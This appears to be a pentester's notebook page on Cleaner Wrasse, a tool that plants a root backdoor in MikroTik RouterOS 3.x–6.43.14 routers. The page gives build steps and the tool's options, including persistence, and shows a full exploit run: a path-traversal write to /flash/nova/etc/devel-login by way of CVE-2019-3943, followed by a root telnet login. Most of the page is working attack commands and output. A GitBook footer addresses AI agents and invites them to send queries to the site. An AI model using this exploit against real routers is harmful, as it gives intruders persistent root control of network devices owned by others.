> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/mikrotik/cleaner-wrasse.md).

# Cleaner Wrasse

### Overview

* Cleaner Wrasse is a tool that remotely enables the hidden busybox shell in routers using RouterOS versions 3.x - 6.43.14. CW doesn't care about the router's architecture or any periphials. It should just work. Once enabled, the hidden shell allows the devel user to login with the admin's password over telnet or SSH. The user is then presented with a root shell. It's damn useful.

### Install and Configuration

```
sudo apt install cmake
sudo apt-get install libboost-all-dev

git clone https://github.com/tenable/routeros.git
cd routeros/
cd cleaner_wrasse/
mkdir build
cd ./build/
cmake ..
make
```

### Usage

```
./cleaner_wrasse 
options:
  -h [ --help ]             A list of command line options
  -v [ --version ]          Display version information
  -u [ --username ] arg     REQUIRED The user to log in as.
  -p [ --password ] arg     The password to log in with (if not provided CW 
                            uses an empty string).
  -i [ --ip ] arg           REQUIRED The IPv4 address to connect to.
  -s [ --symlink ] arg (=0) Add the survival symlink on the target if its 6.41+
  --persistence arg (=0)    Enable persistence on targets 6.41+

./cleaner_wrasse -v
Version: ><(((°> Cleaner Wrasse 1.0 - August 11, 2019 ><(((°>
```

### Exploit

```
./cleaner_wrasse -u admin -p mikrotikmikrotik -i 192.168.15.77 

            ><(((°>         ><(((°>         ><(((°> 
           ╔═╗┬  ┌─┐┌─┐┌┐┌┌─┐┬─┐  ╦ ╦┬─┐┌─┐┌─┐┌─┐┌─┐
           ║  │  ├┤ ├─┤│││├┤ ├┬┘  ║║║├┬┘├─┤└─┐└─┐├┤ 
           ╚═╝┴─┘└─┘┴ ┴┘└┘└─┘┴└─  ╚╩╝┴└─┴ ┴└─┘└─┘└─┘
                    <°)))><         <°)))><         

   "Cleaners are nothing but very clever behavioral parasites"

[+] Trying winbox on 192.168.15.77:8291
[+] Connected on 8291!
[+] Logging in as admin
[+] Login success!
[+] Sending a version request
[+] The device is running RouterOS 6.40.5 (stable)
[+] The backdoor location is /flash/nova/etc/devel-login
[+] We support 3 vulnerabilities for this version:
	1. CVE-2019-3943
	2. HackerFantastic Set Tracefile
	3. CVE-2018-14847
[?] Please select an vulnerability (1-3):1
[+] You've selected CVE-2019-3943. What a fine choice!
[+] Opening //./.././.././../flash/nova/etc/devel-login for writing.
[+] Done! The backdoor is active. ><(((°>

telnet -l devel 192.168.15.77
<admin-password>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://book.ice-wzl.xyz/mikrotik/cleaner-wrasse.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.